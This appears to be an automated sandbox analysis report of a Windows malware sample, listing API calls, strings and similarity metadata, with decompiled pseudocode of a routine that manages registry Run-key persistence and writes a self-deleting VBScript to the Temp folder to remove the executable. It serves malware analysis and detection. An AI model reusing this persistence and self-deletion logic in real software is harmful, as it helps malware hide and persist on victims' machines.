                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 004086E3
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 004086F7
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000080), ref: 00408709
                                  • SetFileAttributesW.KERNEL32(00000000), ref: 00408710
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000528A,00000000,00000004,0041B310,004085CD), ref: 00406D56
                                    • Part of subcall function 00406D41: UnhookWindowsHookEx.USER32(00000000), ref: 00406D5F
                                    • Part of subcall function 00406D41: TerminateThread.KERNEL32(Function_0000526A,00000000), ref: 00406D6F
                                  • _wgetenv.MSVCRT ref: 00408720
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040872B
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408736
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408741
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(Set fso = CreateObject("Scripting.FileSystemObject"),?), ref: 00408753
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,On Error Resume Next,00000000), ref: 00408763
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040876E
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,")), ref: 0040878D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,while fso.FileExists(",00000000), ref: 0040879D
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087AA
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004087B6
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087BF
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087C8
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004087D1
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(fso.DeleteFile ",?,?,00416354), ref: 004087F0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004087FB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408808
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408814
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040881D
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408826
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040882F
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(wend), ref: 00408843
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(0041BC68,00415800), ref: 00408850
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBGABV10@@Z.MSVCP60(?,fso.DeleteFolder ",0041BC68,00416354), ref: 00408867
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000,?,?,?,?,00416354), ref: 00408874
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,00416354), ref: 00408880
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408889
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00416354), ref: 00408892
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041623C), ref: 004088A9
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",00000000,?,00000000), ref: 004088C0
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088CB
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004088D8
                                  • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 004088E5
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004088F1
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004088FA
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408903
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040890C
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408915
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040891E
                                  • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(fso.DeleteFile(Wscript.ScriptFullName)), ref: 0040892C
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408938
                                  • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408942
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040894E
                                    • Part of subcall function 00412D56: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,00000000,0041623C), ref: 00412D93
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00415800,00415800,00000000), ref: 00408967
                                  • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 00408974
                                  • exit.MSVCRT ref: 00408980
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408989
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408992
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040899B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$G@2@@0@V?$basic_string@$?c_str@?$basic_string@Hstd@@$??0?$basic_string@G@1@@V01@V10@Y?$basic_string@$D@2@@std@@D@std@@FileV01@@$TerminateV10@@$??9std@@AttributesThreadV10@0@$?length@?$basic_string@?size@?$basic_string@CreateDeleteExecuteHookModuleNameObjectProcessShellSingleUnhookWaitWindows_wgetenvexit
                                  • String ID: """, 0$")$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
                                  • API String ID: 1819783940-1536747724
                                  • Opcode ID: 4bbe0cf9fda80b10b9bb67cd86d505d9185a0bf42035aa4b63660560c31d1dcd
                                  • Instruction ID: 422d0979f444bffee83793bc3d795cbcdb9f6e23a9fd2fc637ca2dc4c5c01907
                                  • Opcode Fuzzy Hash: 4bbe0cf9fda80b10b9bb67cd86d505d9185a0bf42035aa4b63660560c31d1dcd
                                  • Instruction Fuzzy Hash: 7DB15FB2800509EBCB04EBE0ED4D9EE777CEF94345B54407AF902A3191DF795A48CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00408245, Relevance: 110.5, APIs: 49, Strings: 14, Instructions: 260registryCOMMON
                                  Download Yara Rule
                                  C-Code - Quality: 19%
                                  			E00408245() {
				char _v0;
				signed int _v5;
				char _v6;
				signed int _v9;
				char _v10;
				char _v24;
				char _v28;
				char _v40;
				char _v44;
				char _v56;
				char _v60;
				char _v72;
				char _v76;
				char _v88;
				char _v92;
				void* _v108;
				void* _v124;
				void _v606;
				short _v608;
				short _v644;
				void* _t112;
				void* _t114;
				char* _t116;
				WCHAR* _t118;
				signed char _t120;
				char* _t121;
				char* _t123;
				char* _t126;
				char* _t127;
				char* _t128;
				short* _t131;
				void* _t132;
				char* _t134;
				WCHAR* _t137;
				char* _t138;
				char* _t140;
				char* _t143;
				char* _t144;
				char* _t145;
				char* _t146;
				signed int* _t148;
				char* _t149;
				char* _t150;
				signed int _t151;
				short* _t153;
				char* _t154;
				char* _t155;
				WCHAR* _t157;
				char* _t158;
				char* _t159;
				char* _t163;
				WCHAR* _t165;
				char* _t166;
				char* _t167;
				intOrPtr* _t174;
				short* _t285;
				void* _t297;
				void* _t299;
				void* _t301;
				void* _t303;
				void* _t304;
				void* _t305;
				void* _t306;
				void* _t308;
				void* _t310;

				_t112 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t112 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t112 = E0041050F(_t112);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E00412BEE(_t112);
				}
				_t172 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t112 = E0040B9E8(0x80000002, _t172, _t112);
					_t297 = _t297 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t112);
					_t297 = _t297 + 0xc;
				}
				_v608 = _v608 & 0x00000000;
				_t114 = memset( &_v606, 0, 0x81 << 2);
				asm("stosw");
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t116 = E0040B692(0x80000001,  &_v608, "exepath",  &_v608, 0x208, _t114, _t114);
				_t299 = _t297 + 0x28;
				if(_t116 == 0) {
					_t116 = GetModuleFileNameW(0,  &_v608, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t116);
				_t174 = __imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z;
				_v5 = 1;
				_t118 =  *_t174(0x41bc68, 0x415800);
				if(_t118 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t118, 0x80);
				}
				_t120 = SetFileAttributesW( &_v608, 0x80);
				if(_t120 == 0) {
					_v5 = _v5 & _t120;
				}
				_t121 =  &_v6;
				__imp___wgetenv(L"Temp", _t121, L"\\uninstall.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t121);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v88, _t121);
				_t123 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t123);
				L0041416A();
				_t301 = _t299 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v24, L"On Error Resume Next\n", _t123);
				if(_v5 != 0) {
					_t165 =  &_v608;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t165,  &_v6, L"\")\n");
					_t166 =  &_v72;
					L0041416A();
					_t167 =  &_v40;
					L00414146();
					_t301 = _t301 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t167, _t167, _t166, _t166, L"while fso.FileExists(\"", _t165);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t126 =  &_v6;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t126,  &_v608, L"\"\n");
				_t127 =  &_v72;
				L00414146();
				_t128 =  &_v56;
				L00414146();
				_t303 = _t301 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t128, _t128, _t127, _t127, _t126);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v5 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				_push(0x415800);
				_push(0x41bc68);
				if( *_t174() != 0) {
					_t163 =  &_v72;
					L0041416A();
					_t129 =  &_v56;
					L00414146();
					_t303 = _t303 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t129, _t129, _t163, _t163, L"fso.DeleteFolder \"", 0x41bc68, L"\"\n");
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t131 = E00412D56( &_v24, _t129 << 1, _t129 << 1, _t129, 0);
				_t304 = _t303 + 0x10;
				if(_t131 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					ShellExecuteW(0, L"open", _t131, 0x415800, 0x415800, 0);
				}
				exit(0);
				_pop(_t280);
				_pop(_t291);
				_pop(_t175);
				_t305 = _t304 - 0x27c;
				_t132 = E0040AC8C();
				if( *0x41b154 != 0x30) {
					_t132 = E00406D41(0x41b900);
				}
				if( *0x41c118 == 1) {
					_t132 = E0041050F(_t132);
				}
				if( *0x41b22a != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E00412BEE(_t132);
				}
				_t176 = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\";
				if( *0x41ba58 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000001, L"Software\\Microsoft\\Windows\\CurrentVersion\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41bc64 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, _t176, _t132);
					_t305 = _t305 + 0xc;
				}
				if( *0x41ba20 == 1) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t132 = E0040B9E8(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\\", _t132);
					_t305 = _t305 + 0xc;
				}
				__imp__?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t134 = E0040B692(0x80000001,  &_v644, "exepath",  &_v644, 0x208, _t132, _t132);
				_t306 = _t305 + 0x1c;
				if(_t134 == 0) {
					_t134 = GetModuleFileNameW(0,  &_v644, 0x208);
				}
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				RegDeleteKeyA(0x80000001, _t134);
				_v9 = 1;
				_t137 = SetFileAttributesW( &_v644, 0x80);
				if(_t137 == 0) {
					_v9 = _v9 & _t137;
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t137 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					SetFileAttributesW(_t137, 0x80);
				}
				_t138 =  &_v10;
				__imp___wgetenv(L"Temp", _t138, L"\\update.vbs");
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t138);
				L00414146();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v92, _t138);
				_t140 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"Set fso = CreateObject(\"Scripting.FileSystemObject\")\n", _t140);
				L0041416A();
				_t308 = _t306 + 0x18;
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ( &_v44, L"On Error Resume Next\n", _t140);
				if(_v9 != 0) {
					_t157 =  &_v644;
					__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(_t157,  &_v10, L"\")\n");
					_t158 =  &_v76;
					L0041416A();
					_t159 =  &_v28;
					L00414146();
					_t308 = _t308 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t159, _t159, _t158, _t158, L"while fso.FileExists(\"", _t157);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t285 = L"\"\n";
				_t143 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"fso.DeleteFile \"", _t143,  &_v644, _t285);
				_t144 =  &_v76;
				L00414146();
				_t145 =  &_v60;
				L00414146();
				_t310 = _t308 + 0x18;
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t145, _t145, _t144, _t144, _t143);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				if(_v9 != 0) {
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"wend\n");
				}
				__imp__??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z(0x41bc68, 0x415800);
				if(_t145 != 0) {
					_t154 =  &_v76;
					L0041416A();
					_t155 =  &_v60;
					L00414146();
					_t310 = _t310 + 0x18;
					__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t155, _t155, _t154, _t154, L"fso.DeleteFolder \"", 0x41bc68, _t285);
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				}
				_t146 =  &_v10;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"\"\"\", 0", _t146, "\n");
				_t148 =  &_v9;
				__imp__??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z(L"CreateObject(\"WScript.Shell\").Run \"cmd /c \"\"", _t148,  &_v0, _t146);
				_t149 =  &_v28;
				L0041414C();
				_t150 =  &_v76;
				L0041414C();
				_t151 =  &_v60;
				L00414146();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z(_t151, _t151, _t150, _t150, _t149, _t149, _t148);
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z(L"fso.DeleteFile(Wscript.ScriptFullName)");
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ();
				__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
				_t153 = E00412D56( &_v44, _t151 << 1, _t151 << 1, _t151, 0);
				if(_t153 != 0) {
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t153 = ShellExecuteW(0, L"open", _t153, 0x415800, 0x415800, 0);
					if(_t153 > 0x20) {
						exit(0);
					}
				}
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
				return _t153;
			}




































































                                  0x0040824e
                                  0x0040825a
                                  0x00408261
                                  0x00408261
                                  0x0040826d
                                  0x0040826f
                                  0x0040826f
                                  0x0040827b
                                  0x00408282
                                  0x00408289
                                  0x0040828e
                                  0x0040829e
                                  0x004082a8
                                  0x004082ac
                                  0x004082b5
                                  0x004082ba
                                  0x004082ba
                                  0x004082c4
                                  0x004082c8
                                  0x004082d5
                                  0x004082da
                                  0x004082da
                                  0x004082e4
                                  0x004082e8
                                  0x004082f9
                                  0x004082fe
                                  0x004082fe
                                  0x00408301
                                  0x00408316
                                  0x00408318
                                  0x00408321
                                  0x0040832a
                                  0x0040834a
                                  0x00408352
                                  0x00408357
                                  0x0040835c
                                  0x00408368
                                  0x00408368
                                  0x00408370
                                  0x00408378
                                  0x0040837e
                                  0x00408390
                                  0x00408394
                                  0x0040839a
                                  0x004083a6
                                  0x004083ad
                                  0x004083ad
                                  0x004083bf
                                  0x004083c7
                                  0x004083c9
                                  0x004083c9
                                  0x004083cc
                                  0x004083da
                                  0x004083e5
                                  0x004083f0
                                  0x004083fb
                                  0x00408401
                                  0x0040840d
                                  0x0040841d
                                  0x00408422
                                  0x00408428
                                  0x00408432
                                  0x0040843d
                                  0x00408447
                                  0x0040844e
                                  0x00408457
                                  0x00408460
                                  0x00408464
                                  0x00408469
                                  0x00408470
                                  0x00408479
                                  0x00408482
                                  0x0040848b
                                  0x0040848b
                                  0x0040849d
                                  0x004084a9
                                  0x004084b0
                                  0x004084b4
                                  0x004084bd
                                  0x004084c1
                                  0x004084c6
                                  0x004084cd
                                  0x004084d6
                                  0x004084df
                                  0x004084e8
                                  0x004084f2
                                  0x004084fc
                                  0x004084fc
                                  0x00408502
                                  0x00408503
                                  0x0040850a
                                  0x00408512
                                  0x0040851b
                                  0x00408524
                                  0x00408528
                                  0x0040852d
                                  0x00408534
                                  0x0040853d
                                  0x00408546
                                  0x00408546
                                  0x00408554
                                  0x00408560
                                  0x0040856a
                                  0x00408576
                                  0x0040857d
                                  0x00408582
                                  0x00408587
                                  0x0040858f
                                  0x0040859c
                                  0x0040859c
                                  0x004085a3
                                  0x004085a9
                                  0x004085aa
                                  0x004085ab
                                  0x004085af
                                  0x004085b5
                                  0x004085c1
                                  0x004085c8
                                  0x004085c8
                                  0x004085d4
                                  0x004085d6
                                  0x004085d6
                                  0x004085e2
                                  0x004085e9
                                  0x004085f0
                                  0x004085f5
                                  0x00408605
                                  0x0040860f
                                  0x00408613
                                  0x0040861c
                                  0x00408621
                                  0x00408621
                                  0x0040862b
                                  0x0040862f
                                  0x0040863c
                                  0x00408641
                                  0x00408641
                                  0x0040864b
                                  0x0040864f
                                  0x00408660
                                  0x00408665
                                  0x00408665
                                  0x0040866f
                                  0x00408678
                                  0x00408698
                                  0x004086a0
                                  0x004086a5
                                  0x004086aa
                                  0x004086b6
                                  0x004086b6
                                  0x004086be
                                  0x004086c6
                                  0x004086df
                                  0x004086e3
                                  0x004086e7
                                  0x004086e9
                                  0x004086e9
                                  0x004086f7
                                  0x00408701
                                  0x00408709
                                  0x00408710
                                  0x00408710
                                  0x00408712
                                  0x00408720
                                  0x0040872b
                                  0x00408736
                                  0x00408741
                                  0x00408747
                                  0x00408753
                                  0x00408763
                                  0x00408768
                                  0x0040876e
                                  0x00408778
                                  0x00408783
                                  0x0040878d
                                  0x00408794
